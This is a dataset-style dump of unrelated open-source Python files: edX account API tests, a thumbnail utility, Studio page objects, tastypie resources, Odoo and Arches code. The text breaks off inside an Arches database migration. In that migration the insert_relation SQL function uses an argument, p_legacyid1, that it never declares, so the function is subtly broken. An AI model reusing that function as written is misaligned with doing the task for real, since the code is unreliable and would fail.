| code (string, 2–1.05M chars) | repo_name (string, 5–104) | path (string, 4–251) | language (1 class) | license (15 classes) | size (int32, 2–1.05M) |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Unit tests for behavior that is specific to the api methods (vs. the view methods).
Most of the functionality is covered in test_views.py.
"""
import re
import ddt
from dateutil.parser import parse as parse_datetime
from mock import Mock, patch
from django.test import TestCase
from nose.tools import raises
import unittest
from student.tests.factories import UserFactory
from django.conf import settings
from django.contrib.auth.models import User
from django.core import mail
from django.test.client import RequestFactory
from student.models import PendingEmailChange
from student.tests.tests import UserSettingsEventTestMixin
from ...errors import (
UserNotFound, UserNotAuthorized, AccountUpdateError, AccountValidationError,
AccountUserAlreadyExists, AccountUsernameInvalid, AccountEmailInvalid, AccountPasswordInvalid, AccountRequestError
)
from ..api import (
get_account_settings, update_account_settings, create_account, activate_account, request_password_change
)
from .. import USERNAME_MAX_LENGTH, EMAIL_MAX_LENGTH, PASSWORD_MAX_LENGTH
def mock_render_to_string(template_name, context):
"""Return a string that encodes template_name and context"""
return str((template_name, sorted(context.iteritems())))
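# Illustrative only (values are hypothetical): the helper turns a render call
# into a deterministic string such as
#   mock_render_to_string('emails/confirm.txt', {'key': 'abc'})
#   -> "('emails/confirm.txt', [('key', 'abc')])"
# so tests can assert on the template name and context in one comparison.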
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Account APIs are only supported in LMS')
class TestAccountApi(UserSettingsEventTestMixin, TestCase):
"""
These tests specifically cover the parts of the API methods that are not covered by test_views.py.
This includes the specific types of error raised, and default behavior when optional arguments
are not specified.
"""
password = "test"
def setUp(self):
super(TestAccountApi, self).setUp()
self.request_factory = RequestFactory()
self.table = "student_languageproficiency"
self.user = UserFactory.create(password=self.password)
self.default_request = self.request_factory.get("/api/user/v1/accounts/")
self.default_request.user = self.user
self.different_user = UserFactory.create(password=self.password)
self.staff_user = UserFactory(is_staff=True, password=self.password)
self.reset_tracker()
def test_get_username_provided(self):
"""Test the difference in behavior when a username is supplied to get_account_settings."""
account_settings = get_account_settings(self.default_request)
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, username=self.user.username)
self.assertEqual(self.user.username, account_settings["username"])
account_settings = get_account_settings(self.default_request, username=self.different_user.username)
self.assertEqual(self.different_user.username, account_settings["username"])
def test_get_configuration_provided(self):
"""Test the difference in behavior when a configuration is supplied to get_account_settings."""
config = {
"default_visibility": "private",
"shareable_fields": [
'name',
],
"public_fields": [
'email',
],
}
# With default configuration settings, email is not shared with other (non-staff) users.
account_settings = get_account_settings(self.default_request, self.different_user.username)
self.assertFalse("email" in account_settings)
account_settings = get_account_settings(
self.default_request,
self.different_user.username,
configuration=config
)
self.assertEqual(self.different_user.email, account_settings["email"])
def test_get_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
get_account_settings(self.default_request, username="does_not_exist")
self.user.username = "does_not_exist"
request = self.request_factory.get("/api/user/v1/accounts/")
request.user = self.user
with self.assertRaises(UserNotFound):
get_account_settings(request)
def test_update_username_provided(self):
"""Test the difference in behavior when a username is supplied to update_account_settings."""
update_account_settings(self.user, {"name": "Mickey Mouse"})
account_settings = get_account_settings(self.default_request)
self.assertEqual("Mickey Mouse", account_settings["name"])
update_account_settings(self.user, {"name": "Donald Duck"}, username=self.user.username)
account_settings = get_account_settings(self.default_request)
self.assertEqual("Donald Duck", account_settings["name"])
with self.assertRaises(UserNotAuthorized):
update_account_settings(self.different_user, {"name": "Pluto"}, username=self.user.username)
def test_update_user_not_found(self):
"""Test that UserNotFound is thrown if there is no user with username."""
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {}, username="does_not_exist")
self.user.username = "does_not_exist"
with self.assertRaises(UserNotFound):
update_account_settings(self.user, {})
def test_update_error_validating(self):
"""Test that AccountValidationError is thrown if incorrect values are supplied."""
with self.assertRaises(AccountValidationError):
update_account_settings(self.user, {"username": "not_allowed"})
with self.assertRaises(AccountValidationError):
update_account_settings(self.user, {"gender": "undecided"})
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"profile_image": {"has_image": "not_allowed", "image_url": "not_allowed"}}
)
# Check the various language_proficiencies validation failures.
# language_proficiencies must be a list of dicts, each containing a
# unique 'code' key representing the language code.
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"language_proficiencies": "not_a_list"}
)
with self.assertRaises(AccountValidationError):
update_account_settings(
self.user,
{"language_proficiencies": [{}]}
)
def test_update_multiple_validation_errors(self):
"""Test that all validation errors are built up and returned at once"""
# Send a read-only error, serializer error, and email validation error.
naughty_update = {
"username": "not_allowed",
"gender": "undecided",
"email": "not an email address"
}
with self.assertRaises(AccountValidationError) as context_manager:
update_account_settings(self.user, naughty_update)
field_errors = context_manager.exception.field_errors
self.assertEqual(3, len(field_errors))
self.assertEqual("This field is not editable via this API", field_errors["username"]["developer_message"])
self.assertIn(
"Value \'undecided\' is not valid for field \'gender\'",
field_errors["gender"]["developer_message"]
)
self.assertIn("Valid e-mail address required.", field_errors["email"]["developer_message"])
@patch('django.core.mail.send_mail')
@patch('student.views.render_to_string', Mock(side_effect=mock_render_to_string, autospec=True))
def test_update_sending_email_fails(self, send_mail):
"""Test what happens if all validation checks pass, but sending the email for email change fails."""
send_mail.side_effect = [Exception, None]
less_naughty_update = {
"name": "Mickey Mouse",
"email": "seems_ok@sample.com"
}
with self.assertRaises(AccountUpdateError) as context_manager:
update_account_settings(self.user, less_naughty_update)
self.assertIn("Error thrown from do_email_change_request", context_manager.exception.developer_message)
# Verify that the name change happened, even though the attempt to send the email failed.
account_settings = get_account_settings(self.default_request)
self.assertEqual("Mickey Mouse", account_settings["name"])
@patch('openedx.core.djangoapps.user_api.accounts.serializers.AccountUserSerializer.save')
def test_serializer_save_fails(self, serializer_save):
"""
Test the behavior of one of the serializers failing to save. Note that email request change
won't be processed in this case.
"""
serializer_save.side_effect = [Exception, None]
update_will_fail = {
"name": "Mickey Mouse",
"email": "ok@sample.com"
}
with self.assertRaises(AccountUpdateError) as context_manager:
update_account_settings(self.user, update_will_fail)
self.assertIn("Error thrown when saving account updates", context_manager.exception.developer_message)
# Verify that no email change request was initiated.
pending_change = PendingEmailChange.objects.filter(user=self.user)
self.assertEqual(0, len(pending_change))
def test_language_proficiency_eventing(self):
"""
        Test that eventing of language proficiencies, which happens in the update_account_settings method, behaves correctly.
"""
def verify_event_emitted(new_value, old_value):
"""
Confirm that the user setting event was properly emitted
"""
update_account_settings(self.user, {"language_proficiencies": new_value})
self.assert_user_setting_event_emitted(setting='language_proficiencies', old=old_value, new=new_value)
self.reset_tracker()
# Change language_proficiencies and verify events are fired.
verify_event_emitted([{"code": "en"}], [])
verify_event_emitted([{"code": "en"}, {"code": "fr"}], [{"code": "en"}])
# Note that events are fired even if there has been no actual change.
verify_event_emitted([{"code": "en"}, {"code": "fr"}], [{"code": "en"}, {"code": "fr"}])
verify_event_emitted([], [{"code": "en"}, {"code": "fr"}])
@patch('openedx.core.djangoapps.user_api.accounts.image_helpers._PROFILE_IMAGE_SIZES', [50, 10])
@patch.dict(
'openedx.core.djangoapps.user_api.accounts.image_helpers.PROFILE_IMAGE_SIZES_MAP',
{'full': 50, 'small': 10},
clear=True
)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Account APIs are only supported in LMS')
class AccountSettingsOnCreationTest(TestCase):
# pylint: disable=missing-docstring
USERNAME = u'frank-underwood'
PASSWORD = u'ṕáśśẃőŕd'
EMAIL = u'frank+underwood@example.com'
def test_create_account(self):
# Create a new account, which should have empty account settings by default.
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
# Retrieve the account settings
user = User.objects.get(username=self.USERNAME)
request = RequestFactory().get("/api/user/v1/accounts/")
request.user = user
account_settings = get_account_settings(request)
# Expect a date joined field but remove it to simplify the following comparison
self.assertIsNotNone(account_settings['date_joined'])
del account_settings['date_joined']
# Expect all the values to be defaulted
self.assertEqual(account_settings, {
'username': self.USERNAME,
'email': self.EMAIL,
'name': u'',
'gender': None,
'goals': None,
'is_active': False,
'level_of_education': None,
'mailing_address': None,
'year_of_birth': None,
'country': None,
'bio': None,
'profile_image': {
'has_image': False,
'image_url_full': request.build_absolute_uri('/static/default_50.png'),
'image_url_small': request.build_absolute_uri('/static/default_10.png'),
},
'requires_parental_consent': True,
'language_proficiencies': [],
})
@ddt.ddt
class AccountCreationActivationAndPasswordChangeTest(TestCase):
"""
Test cases to cover the account initialization workflow
"""
USERNAME = u'frank-underwood'
PASSWORD = u'ṕáśśẃőŕd'
EMAIL = u'frank+underwood@example.com'
ORIG_HOST = 'example.com'
IS_SECURE = False
INVALID_USERNAMES = [
None,
u'',
u'a',
u'a' * (USERNAME_MAX_LENGTH + 1),
u'invalid_symbol_@',
u'invalid-unicode_fŕáńḱ',
]
INVALID_EMAILS = [
None,
u'',
u'a',
'no_domain',
'no+domain',
'@',
'@domain.com',
'test@no_extension',
u'fŕáńḱ@example.com',
u'frank@éxáḿṕĺé.ćőḿ',
# Long email -- subtract the length of the @domain
# except for one character (so we exceed the max length limit)
u'{user}@example.com'.format(
user=(u'e' * (EMAIL_MAX_LENGTH - 11))
)
]
INVALID_PASSWORDS = [
None,
u'',
u'a',
u'a' * (PASSWORD_MAX_LENGTH + 1)
]
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in lms')
def test_activate_account(self):
# Create the account, which is initially inactive
activation_key = create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
user = User.objects.get(username=self.USERNAME)
request = RequestFactory().get("/api/user/v1/accounts/")
request.user = user
account = get_account_settings(request)
self.assertEqual(self.USERNAME, account["username"])
self.assertEqual(self.EMAIL, account["email"])
self.assertFalse(account["is_active"])
# Activate the account and verify that it is now active
activate_account(activation_key)
account = get_account_settings(request)
self.assertTrue(account['is_active'])
def test_create_account_duplicate_username(self):
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
with self.assertRaises(AccountUserAlreadyExists):
create_account(self.USERNAME, self.PASSWORD, 'different+email@example.com')
# Email uniqueness constraints were introduced in a database migration,
# which we disable in the unit tests to improve the speed of the test suite.
@unittest.skipUnless(settings.SOUTH_TESTS_MIGRATE, "South migrations required")
def test_create_account_duplicate_email(self):
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
with self.assertRaises(AccountUserAlreadyExists):
create_account('different_user', self.PASSWORD, self.EMAIL)
def test_username_too_long(self):
long_username = 'e' * (USERNAME_MAX_LENGTH + 1)
with self.assertRaises(AccountUsernameInvalid):
create_account(long_username, self.PASSWORD, self.EMAIL)
@raises(AccountEmailInvalid)
@ddt.data(*INVALID_EMAILS)
def test_create_account_invalid_email(self, invalid_email):
create_account(self.USERNAME, self.PASSWORD, invalid_email)
@raises(AccountPasswordInvalid)
@ddt.data(*INVALID_PASSWORDS)
def test_create_account_invalid_password(self, invalid_password):
create_account(self.USERNAME, invalid_password, self.EMAIL)
@raises(AccountPasswordInvalid)
def test_create_account_username_password_equal(self):
# Username and password cannot be the same
create_account(self.USERNAME, self.USERNAME, self.EMAIL)
@raises(AccountRequestError)
@ddt.data(*INVALID_USERNAMES)
def test_create_account_invalid_username(self, invalid_username):
create_account(invalid_username, self.PASSWORD, self.EMAIL)
@raises(UserNotAuthorized)
def test_activate_account_invalid_key(self):
activate_account(u'invalid')
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change(self):
# Create and activate an account
activation_key = create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
activate_account(activation_key)
# Request a password change
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that one email message has been sent
self.assertEqual(len(mail.outbox), 1)
# Verify that the body of the message contains something that looks
# like an activation link
email_body = mail.outbox[0].body
        result = re.search(r'(?P<url>https?://[^\s]+)', email_body)
        self.assertIsNotNone(result)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change_invalid_user(self):
with self.assertRaises(UserNotFound):
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that no email messages have been sent
self.assertEqual(len(mail.outbox), 0)
@unittest.skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Test only valid in LMS')
def test_request_password_change_inactive_user(self):
# Create an account, but do not activate it
create_account(self.USERNAME, self.PASSWORD, self.EMAIL)
request_password_change(self.EMAIL, self.ORIG_HOST, self.IS_SECURE)
# Verify that the activation email was still sent
self.assertEqual(len(mail.outbox), 1)
def _assert_is_datetime(self, timestamp):
"""
Internal helper to validate the type of the provided timestamp
"""
if not timestamp:
return False
try:
parse_datetime(timestamp)
except ValueError:
return False
else:
return True
| adoosii/edx-platform | openedx/core/djangoapps/user_api/accounts/tests/test_api.py | Python | agpl-3.0 | 18,244 |
import Image
import base64
import StringIO
from wand.image import Image as WandImage
from wand.color import Color
def _open_image(filename):
    try:
        im = Image.open(filename)
    except IOError:
        im = None
    return im
def get_thumbnail_size(height, width, max_height, max_width):
    # Compare aspect ratios in floating point; with bare ints this is integer
    # division under Python 2 and can select the wrong branch.
    if (float(width) / max_width) > (float(height) / max_height):
        s = float(max_height) / float(height)
    else:
        s = float(max_width) / float(width)
    tw = int(float(width) * s)
    th = int(float(height) * s)
    return tw, th
def pil_make_thumbnail(im, max_height, max_width):
width = im.size[0]
height = im.size[1]
tw, th = get_thumbnail_size(height, width, max_height, max_width)
return im.resize((tw, th), Image.ANTIALIAS)
def _pdf_thumbnail(filename):
img = WandImage(filename=filename + '[0]')
img.background_color = Color('white')
tw, th = get_thumbnail_size(img.height, img.width, 50, 50)
img.resize(tw, th)
rawData = img.make_blob('jpeg')
return base64.b64encode(rawData)
def _image_thumbnail(filename):
im = _open_image(filename)
if im:
width = im.size[0]
height = im.size[1]
im5 = pil_make_thumbnail(im, 50, 50)
io = StringIO.StringIO()
im5.save(io, 'jpeg')
rawData = io.getvalue()
return base64.b64encode(rawData)
return None
def get_thumbnail(filename, field_name='value', mimetype=None):
if mimetype and 'pdf' in mimetype:
rv = {field_name: _pdf_thumbnail(filename)}
else:
rv = {field_name: _image_thumbnail(filename)}
return rv
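# Minimal sanity check, not part of the original module (hypothetical values):
# for a 200x100 image bounded to 50x50, width/max_width (4.0) exceeds
# height/max_height (2.0), so the height ratio sets the scale and the result
# covers the bound rather than fitting inside it.
if __name__ == '__main__':
    print get_thumbnail_size(100, 200, 50, 50)  # -> (100, 50)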
| CaliopeProject/CaliopeServer | src/cid/utils/thumbnails.py | Python | agpl-3.0 | 1,682 |
from __future__ import unicode_literals
import factory
from factory.mongoengine import MongoEngineFactory
from .models import Issue
class IssueFactory(MongoEngineFactory):
class Meta:
model = Issue
title = factory.Faker('sentence')
| jphnoel/udata | udata/core/issues/factories.py | Python | agpl-3.0 | 254 |
from bok_choy.page_object import PageObject
from . import BASE_URL
class SignupPage(PageObject):
"""
Signup page for Studio.
"""
name = "studio.signup"
def url(self):
return BASE_URL + "/signup"
def is_browser_on_page(self):
return self.is_css_present('body.view-signup')
| pelikanchik/edx-platform | common/test/acceptance/edxapp_pages/studio/signup.py | Python | agpl-3.0 | 317 |
# -*- coding: utf-8 -*-
from tastypie import fields as base_fields
from tastypie_mongoengine import fields
from timeline.api.resources.base import TimelineEntryBaseResource
from timeline.api.doc import HELP_TEXT
from timeline.models import invoicing_entries
__all__ = (
'QuotationChangedStateResource',
'PurchaseOrderChangedStateResource',
'InvoiceChangedStateResource',
'DownPaymentInvoiceChangedStateResource',
'CreditNoteChangedStateResource',
)
class InvoiceBaseChangedStateResource(TimelineEntryBaseResource):
previous_state = base_fields.CharField(
attribute='previous_state',
help_text=HELP_TEXT['invoicebase_changed_state']['previous_state'],
)
new_state = base_fields.CharField(
attribute='new_state',
help_text=HELP_TEXT['invoicebase_changed_state']['new_state'],
)
class Meta(TimelineEntryBaseResource.Meta):
pass
class QuotationChangedStateResource(InvoiceBaseChangedStateResource):
quotation_reference = base_fields.CharField(
attribute='quotation__reference',
help_text=HELP_TEXT['invoicebase_saved']['quotation_reference'],
)
quotation = fields.ReferenceField(
to='invoicing.api.resources.QuotationResource',
attribute='quotation',
help_text=HELP_TEXT['invoicebase_changed_state']['quotation']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'quotation_changed_state'
object_class = invoicing_entries.QuotationChangedState
class PurchaseOrderChangedStateResource(InvoiceBaseChangedStateResource):
purchase_order_reference = base_fields.CharField(
attribute='purchase_order__reference',
help_text=HELP_TEXT['invoicebase_saved']['purchase_order_reference'],
)
purchase_order = fields.ReferenceField(
to='invoicing.api.resources.PurchaseOrderResource',
attribute='purchase_order',
help_text=HELP_TEXT['invoicebase_changed_state']['purchase_order']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'purchase_order_changed_state'
object_class = invoicing_entries.PurchaseOrderChangedState
class InvoiceChangedStateResource(InvoiceBaseChangedStateResource):
invoice_reference = base_fields.CharField(
attribute='invoice__reference',
help_text=HELP_TEXT['invoicebase_saved']['invoice_reference'],
)
invoice = fields.ReferenceField(
to='invoicing.api.resources.InvoiceResource',
attribute='invoice',
help_text=HELP_TEXT['invoicebase_changed_state']['invoice']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'invoice_changed_state'
object_class = invoicing_entries.InvoiceChangedState
class DownPaymentInvoiceChangedStateResource(InvoiceBaseChangedStateResource):
down_payment_invoice_reference = base_fields.CharField(
attribute='down_payment_invoice__reference',
help_text=HELP_TEXT['invoicebase_saved']['down_payment_invoice_reference'],
)
down_payment_invoice = fields.ReferenceField(
to='invoicing.api.resources.DownPaymentInvoiceResource',
attribute='down_payment_invoice',
help_text=HELP_TEXT['invoicebase_changed_state']['down_payment_invoice']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'down_payment_invoice_changed_state'
object_class = invoicing_entries.DownPaymentInvoiceChangedState
class CreditNoteChangedStateResource(InvoiceBaseChangedStateResource):
credit_note_reference = base_fields.CharField(
attribute='credit_note__reference',
help_text=HELP_TEXT['invoicebase_saved']['credit_note_reference'],
)
credit_note = fields.ReferenceField(
to='invoicing.api.resources.CreditNoteResource',
attribute='credit_note',
help_text=HELP_TEXT['invoicebase_changed_state']['credit_note']
)
class Meta(InvoiceBaseChangedStateResource.Meta):
resource_name = 'credit_note_changed_state'
object_class = invoicing_entries.CreditNoteChangedState
| Naeka/vosae-app | www/timeline/api/resources/invoicing_entries/invoicebase_changed_state.py | Python | agpl-3.0 | 4,124 |
import sys
from lxml import etree
def fast_iter(source, func):
    context = etree.iterparse(source, events=('end', 'start'))
    context = iter(context)
    event, root = context.next()
    for event, elem in context:
        if event == 'end':
            func(elem)
            root.clear()
    del context

def parseelem(elem):
    print elem.tag

fast_iter(sys.stdin, parseelem)
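# Hedged usage note (not in the original script): feed an OSM XML dump on
# stdin, e.g. `python parseosm.py < map.osm`. Clearing the root element after
# each 'end' event is what keeps memory flat on multi-gigabyte files.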
| bigr/map1 | osm/parseosm.py | Python | agpl-3.0 | 363 |
from . import mail_mass_mailing_list
from . import mail_mass_mailing_contact
from . import education_group
| oihane/odoo-addons | education_group_mail_list/models/__init__.py | Python | agpl-3.0 | 107 |
from bok_choy.page_object import PageObject
from selenium.webdriver.common.keys import Keys
from common.test.acceptance.pages.common.utils import click_css
from common.test.acceptance.tests.helpers import select_option_by_text, get_selected_option_text
from selenium.webdriver.support.ui import Select
class BaseComponentEditorView(PageObject):
"""
A base :class:`.PageObject` for the component and visibility editors.
This class assumes that the editor is our default editor as displayed for xmodules.
"""
BODY_SELECTOR = '.xblock-editor'
def __init__(self, browser, locator):
"""
Args:
browser (selenium.webdriver): The Selenium-controlled browser that this page is loaded in.
locator (str): The locator that identifies which xblock this :class:`.xblock-editor` relates to.
"""
super(BaseComponentEditorView, self).__init__(browser)
self.locator = locator
def is_browser_on_page(self):
return self.q(css='{}[data-locator="{}"]'.format(self.BODY_SELECTOR, self.locator)).present
def _bounded_selector(self, selector):
"""
Return `selector`, but limited to this particular `ComponentEditorView` context
"""
return '{}[data-locator="{}"] {}'.format(
self.BODY_SELECTOR,
self.locator,
selector
)
def url(self):
"""
Returns None because this is not directly accessible via URL.
"""
return None
def save(self):
"""
Clicks save button.
"""
click_css(self, 'a.action-save')
def cancel(self):
"""
Clicks cancel button.
"""
click_css(self, 'a.action-cancel', require_notification=False)
class ComponentEditorView(BaseComponentEditorView):
"""
A :class:`.PageObject` representing the rendered view of a component editor.
"""
def get_setting_element(self, label):
"""
        Returns the setting element with the given label (display name) within the Settings modal, or None if not found.
"""
settings_button = self.q(css='.edit-xblock-modal .editor-modes .settings-button')
if settings_button.is_present():
settings_button.click()
setting_labels = self.q(css=self._bounded_selector('.metadata_edit .wrapper-comp-setting .setting-label'))
for index, setting in enumerate(setting_labels):
if setting.text == label:
return self.q(css=self._bounded_selector('.metadata_edit div.wrapper-comp-setting .setting-input'))[index]
return None
def set_field_value_and_save(self, label, value):
"""
Sets the text field with given label (display name) to the specified value, and presses Save.
"""
elem = self.get_setting_element(label)
# Clear the current value, set the new one, then
# Tab to move to the next field (so change event is triggered).
elem.clear()
elem.send_keys(value)
elem.send_keys(Keys.TAB)
self.save()
def set_select_value_and_save(self, label, value):
"""
Sets the select with given label (display name) to the specified value, and presses Save.
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
self.save()
def get_selected_option_text(self, label):
"""
Returns the text of the first selected option for the select with given label (display name).
"""
elem = self.get_setting_element(label)
if elem:
select = Select(elem)
return select.first_selected_option.text
else:
return None
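# Hedged usage sketch (hypothetical locator and labels, not from this module):
#
#   editor = ComponentEditorView(self.browser, component.locator)
#   editor.set_field_value_and_save('Display Name', 'My Unit')
#   editor.set_select_value_and_save('Randomization', 'never')
#
# get_setting_element scopes every query through _bounded_selector, so two
# editors for different xblocks on the same page do not collide.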
class ComponentVisibilityEditorView(BaseComponentEditorView):
"""
A :class:`.PageObject` representing the rendered view of a component visibility editor.
"""
OPTION_SELECTOR = '.partition-group-control .field'
ALL_LEARNERS_AND_STAFF = 'All Learners and Staff'
CONTENT_GROUP_PARTITION = 'Content Groups'
ENROLLMENT_TRACK_PARTITION = "Enrollment Tracks"
@property
def all_group_options(self):
"""
Return all partition groups.
"""
return self.q(css=self._bounded_selector(self.OPTION_SELECTOR)).results
@property
def current_groups_message(self):
"""
This returns the message shown at the top of the visibility dialog about the
current visibility state (at the time that the dialog was opened).
        For example, "Currently visible to: All Learners and Staff".
"""
return self.q(css=self._bounded_selector('.visibility-header'))[0].text
@property
def selected_partition_scheme(self):
"""
Return the selected partition scheme (or "All Learners and Staff"
if no partitioning is selected).
"""
selector = self.q(css=self._bounded_selector('.partition-visibility select'))
return get_selected_option_text(selector)
def select_partition_scheme(self, partition_name):
"""
Sets the selected partition scheme to the one with the
matching name.
"""
selector = self.q(css=self._bounded_selector('.partition-visibility select'))
select_option_by_text(selector, partition_name, focus_out=True)
@property
def selected_groups(self):
"""
Return all selected partition groups. If none are selected,
        returns an empty list.
"""
results = []
for option in self.all_group_options:
checkbox = option.find_element_by_css_selector('input')
if checkbox.is_selected():
results.append(option)
return results
def select_group(self, group_name, save=True):
"""
Select the first group which has a label matching `group_name`.
Arguments:
group_name (str): The name of the group.
save (boolean): Whether the "save" button should be clicked
afterwards.
Returns:
bool: Whether a group with the provided name was found and clicked.
"""
for option in self.all_group_options:
if group_name in option.text:
checkbox = option.find_element_by_css_selector('input')
checkbox.click()
if save:
self.save()
return True
return False
def select_groups_in_partition_scheme(self, partition_name, group_names):
"""
Select groups in the provided partition scheme. The "save"
button is clicked afterwards.
"""
self.select_partition_scheme(partition_name)
for label in group_names:
self.select_group(label, save=False)
self.save()
| romain-li/edx-platform | common/test/acceptance/pages/studio/component_editor.py | Python | agpl-3.0 | 6,854 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from operator import itemgetter
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp import api
class res_partner(osv.osv):
    """ Inherits partner and adds payment information in the partner form """
    _name = 'res.partner'
    _inherit = 'res.partner'
    _description = 'Partner'

    def _payment_count(self, cr, uid, ids, field_name, arg, context=None):
        Payment = self.pool['account.voucher']
        return {
            partner_id: Payment.search_count(cr, uid, [('partner_id', '=', partner_id)])
            for partner_id in ids
        }

    _columns = {
        'payment_count': fields.function(_payment_count, string='Payments', type='integer'),
    }
| spadae22/odoo | addons/account_voucher/partner.py | Python | agpl-3.0 | 1,722 |
# Primitive function: Min
# Chooses the smaller of two numbers
__author__ = "Gonzalo"
from Greaterthan import Greaterthan
from If import If

def Min(a, b):
    return If(Greaterthan(b, a), a, b)

if __name__ == "__main__":
    print(Min(1, 3))
| gcobos/rft | app/primitives/Min.py | Python | agpl-3.0 | 248 |
# -*- coding: utf-8 -*-
import os
import uuid
import codecs
import django.contrib.gis.db.models.fields
from django.core import management
from django.contrib.postgres.fields import JSONField
from django.db import migrations, models
from arches.db.migration_operations.extras import CreateExtension, CreateAutoPopulateUUIDField, CreateFunction
from arches.app.models.system_settings import settings
def get_sql_string_from_file(pathtofile):
    with codecs.open(pathtofile, encoding="utf-8") as f:
        return f.read()
def forwards_func(apps, schema_editor):
# We get the model from the versioned app registry;
# if we directly import it, it'll be the wrong version
pass
def reverse_func(apps, schema_editor):
Ontology = apps.get_model("models", "Ontology")
Ontology.objects.filter(version="6.2").delete()
# a work around for not being able to create permissions during an initial migration
# from https://code.djangoproject.com/ticket/23422#comment:6
def make_permissions(apps, schema_editor, with_create_permissions=True):
db_alias = schema_editor.connection.alias
Group = apps.get_model("auth", "Group")
User = apps.get_model("auth", "User")
Permission = apps.get_model("auth", "Permission")
try:
read_nodegroup = Permission.objects.using(db_alias).get(
codename="read_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
write_nodegroup = Permission.objects.using(db_alias).get(
codename="write_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
delete_nodegroup = Permission.objects.using(db_alias).get(
codename="delete_nodegroup", content_type__app_label="models", content_type__model="nodegroup"
)
except Permission.DoesNotExist:
if with_create_permissions:
# Manually run create_permissions
from django.contrib.auth.management import create_permissions
assert not getattr(apps, "models_module", None)
model_app = apps.get_app_config("models")
model_app.models_module = True
create_permissions(model_app, verbosity=0)
model_app.models_module = None
return make_permissions(apps, schema_editor, with_create_permissions=False)
else:
raise
graph_editor_group = Group.objects.using(db_alias).create(name="Graph Editor")
graph_editor_group.permissions.add(read_nodegroup, write_nodegroup, delete_nodegroup)
resource_editor_group = Group.objects.using(db_alias).create(name="Resource Editor")
rdm_admin_group = Group.objects.using(db_alias).create(name="RDM Administrator")
app_admin_group = Group.objects.using(db_alias).create(name="Application Administrator")
sys_admin_group = Group.objects.using(db_alias).create(name="System Administrator")
mobile_project_admin_group = Group.objects.using(db_alias).create(name="Mobile Project Administrator")
crowdsource_editor_group = Group.objects.using(db_alias).create(name="Crowdsource Editor")
guest_group = Group.objects.using(db_alias).create(name="Guest")
anonymous_user = User.objects.using(db_alias).get(username="anonymous")
anonymous_user.groups.add(guest_group)
admin_user = User.objects.using(db_alias).get(username="admin")
admin_user.groups.add(graph_editor_group)
admin_user.groups.add(resource_editor_group)
admin_user.groups.add(rdm_admin_group)
admin_user.groups.add(app_admin_group)
admin_user.groups.add(sys_admin_group)
admin_user.groups.add(mobile_project_admin_group)
admin_user.groups.add(crowdsource_editor_group)
admin_user.groups.add(guest_group)
class Migration(migrations.Migration):
dependencies = []
initial = True
operations = [
CreateExtension(name="uuid-ossp"),
CreateFunction(
name="insert_relation",
arguments=["p_label text", "p_relationtype text", "p_legacyid2 text"],
declarations=["v_conceptidfrom uuid = null;", "v_conceptidto uuid = null;"],
language="plpgsql",
body="""
v_conceptidfrom =
(select conceptid from concepts c
where trim(legacyoid) = trim(p_legacyid1));
v_conceptidto = (select conceptid from concepts c
where trim(legacyoid) = trim(p_legacyid2));
IF v_conceptidfrom is not null and v_conceptidto is not null and
v_conceptidto <> v_conceptidfrom and
v_conceptidfrom::text||v_conceptidto::text NOT IN (SELECT conceptidfrom::text||conceptidto::text FROM relations) then
INSERT INTO relations(relationid, conceptidfrom, conceptidto, relationtype) VALUES (uuid_generate_v1mc(), v_conceptidfrom, v_conceptidto, p_relationtype);
return 'success!';
ELSE return 'fail! no relation inserted.';
END IF;
""",
returntype="text",
),
CreateFunction(
name="get_conceptid",
arguments=["p_label text"],
declarations=["v_return text;",],
language="plpgsql",
body="""
v_return =
(select a.conceptid from concepts a, values b
where 1=1 and
b.valuetype = 'prefLabel' and
b.value = p_label and
b.conceptid = a.conceptid LIMIT 1);
return v_return;
""",
returntype="uuid",
),
CreateFunction(
name="insert_concept",
arguments=["p_label text", "p_note text", "p_languageid text", "p_legacyid text", "p_nodetype text"],
declarations=[
"v_conceptid uuid = public.uuid_generate_v1mc();",
"v_valueid uuid = public.uuid_generate_v1mc();",
"v_languageid text = p_languageid;",
],
language="plpgsql",
body="""
INSERT INTO concepts(conceptid, nodetype, legacyoid) VALUES (v_conceptid, p_nodetype, p_legacyid);
